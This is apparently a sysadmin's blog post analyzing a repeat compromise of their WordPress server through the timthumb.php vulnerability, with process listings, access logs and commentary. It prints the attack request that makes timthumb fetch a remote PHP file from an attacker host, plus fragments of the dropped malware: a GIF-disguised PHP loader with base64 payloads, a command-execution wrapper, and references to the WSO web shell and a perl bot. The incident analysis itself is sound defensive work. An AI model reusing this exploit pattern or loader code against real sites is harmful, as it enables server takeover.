Update on the timthumb Wordpress hack - it happened again!

Written by - 0 comments

Published on - Listed in Linux PHP Internet Hacks


I already wrote an article this week about the timthumb.php vulnerability which allows hackers to upload and execute files via Wordpress blogs.

Last time the hack took me by surprise, this time I was prepared. I set up a special monitoring for new processes and tonight the trap worked. At 20:06 a fake process was launched by www-data:

# ps auxf | grep www
root     16995  0.0  0.0  87856   716 pts/0    S+   21:00   0:00                      \_ grep www
www-data  7170  0.0  0.9 225316 40088 ?        S    14:06   0:00  \_ /usr/sbin/apache2 -k start
www-data 29483 14.5 10.4 1049984 419648 ?      Sl   17:37  29:36  \_ /usr/sbin/apache2 -k start
www-data  2594 14.3  9.0 1022848 366568 ?      Sl   18:30  21:24  \_ /usr/sbin/apache2 -k start
www-data  6318 11.5  9.0 1088992 364764 ?      Sl   19:13  12:19  \_ /usr/sbin/apache2 -k start
www-data 11256  0.0  0.0      0     0 ?        Z    20:06   0:00      \_ [sh]
www-data 11260 97.5  0.1  24592  5336 ?        R    20:06  52:26 /usr/sbin/httpd

After a quick research on access logs, I've found the following entries:

184.73.160.230 - - [12/Nov/2011:20:06:23 +0100] "GET / HTTP/1.1" 200 31358 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Fire
fox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:27 +0100] "GET /wp-content/themes/DeepFocus/timthumb.php?src=http://picasa.com.thomaswdufour.com/patcherfinal.php HTTP/
1.1" 400 582 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

184.73.160.230 - - [12/Nov/2011:20:06:29 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=uname HTTP/1.1" 200
 139 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:39 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=backup HTTP/1.1" 20
0 66 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:39 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=check HTTP/1.1" 200
 135 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:39 +0100] "GET /wp-content/themes/DeepFocus/inc.php HTTP/1.1" 200 126 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-
US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
184.73.160.230 - - [12/Nov/2011:20:06:40 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=patch HTTP/1.1" 200
 63 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

As soon as I saw the timthumb.php, the hack was immediately known to me. But this time it was a little bit different. In the last post only a command was executed, the uploaded php file was rather small. This time, the uploaded php file from source http://picasa.com.thomaswdufour.com/patcherfinal.php was rather big and even creates new sockets.

The file starts again with a binary code, like this:

GIF89a????????!?????,???????D?;?// Coded [c] 2011 by v0ld3m0rt
// Unknown Indonesian H4xx0r
error_reporting(0);
$uname = php_uname();
$htaccess = "PEZpbGVzIH4gIlwuKHBocHxwaHAzfGNnaXxwaHA0fHBocDUpJCI+DQogIGRlbnkgZnJvbSBhbGwNCjwvRmlsZXM+";
$data = "PD9waHANCi8qIFdTTyAyLjEgKFdlYiBTaGVsbCBieSBvUmIpICovDQppZighZmlsZV9leGlzdH....

But the more interesting part comes at the end:

function ex($in) {
        $out = '';
        if(function_exists('exec')) {
                @exec($in,$out);
                $out = @join("\n",$out);
        }elseif(function_exists('passthru')) {
                ob_start();
                @passthru($in);
                $out = ob_get_clean();
        }elseif(function_exists('system')) {
                ob_start();
                @system($in);
                $out = ob_get_clean();
        }elseif(function_exists('shell_exec')) {
                $out = shell_exec($in);
        }elseif(is_resource($f = @popen($in,"r"))) {
                $out = "";
                while(!@feof($f))
                        $out .= fread($f,1024);
                pclose($f);
        }
        return $out;
}

function CreateFile($path, $content)
{
        $handle = fopen($path, "a+");
        fwrite($handle, $content);
        fclose($handle);
}

You can take a look at the full file here: external_patcherfinal.txt

The php script allows the hacker to execute commands on the server by using the functions passthru, system and shell_exec. But those functions are disabled on my server.
However by using the function popen, a forked command (in this case a bot) could be launched, which was executed just after the upload:

184.73.160.230 - - [12/Nov/2011:20:06:29 +0100] "GET /wp-content/themes/DeepFocus/cache/external_dba6868eba22b3fabd3e54b8a29071ef.php?act=infect&bot=[somebinarycode] HTTP/1.1" 200 49 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

Now it doesn't stop here. As one can see in the access log, another file 'inc.php' was as well accessed. If opened by browser, it looks like this:

Timthumb Hack - web shell uploaded

The file  starts with the following code:

/* WSO 2.1 (Web Shell by oRb) */
if(!file_exists("data.php")) {
        WriteData();

Interesting, a php shell was uploaded. Let's take a look at it by modifying the password function:

wso webshell

And by using this web-shell, other files can be uploaded, executed, overwritten, and so on.

Two more files were found in the same directory: data.php and in the cache folder was a file called 'sex'. The 'sex'-file was actually a perl file which was then most probably executed by the shell. And this is the source of the fake Apache process discovered at first.


Add a comment

Show form to leave a comment

Comments (newest first)

No comments yet.

RSS feed

Blog Tags:

  AWS   Android   Ansible   Apache   Apple   Atlassian   BSD   Backup   Bash   Bluecoat   CMS   Chef   Cloud   Coding   Consul   Containers   CouchDB   DB   DNS   Database   Databases   Docker   ELK   Elasticsearch   Filebeat   FreeBSD   Galera   Git   GlusterFS   Grafana   Graphics   HAProxy   HTML   Hacks   Hardware   Icinga   Influx   Internet   Java   KVM   Kibana   Kodi   Kubernetes   LVM   LXC   Linux   Logstash   Mac   Macintosh   Mail   MariaDB   Minio   MongoDB   Monitoring   Multimedia   MySQL   NFS   Nagios   Network   Nginx   OSSEC   OTRS   Office   OpenSearch   PGSQL   PHP   Perl   Personal   PostgreSQL   Postgres   PowerDNS   Proxmox   Proxy   Python   Rancher   Rant   Redis   Roundcube   SSL   Samba   Seafile   Security   Shell   SmartOS   Solaris   Surveillance   Systemd   TLS   Tomcat   Ubuntu   Unix   VMWare   VMware   Varnish   Virtualization   Windows   Wireless   Wordpress   Wyse   ZFS   Zoneminder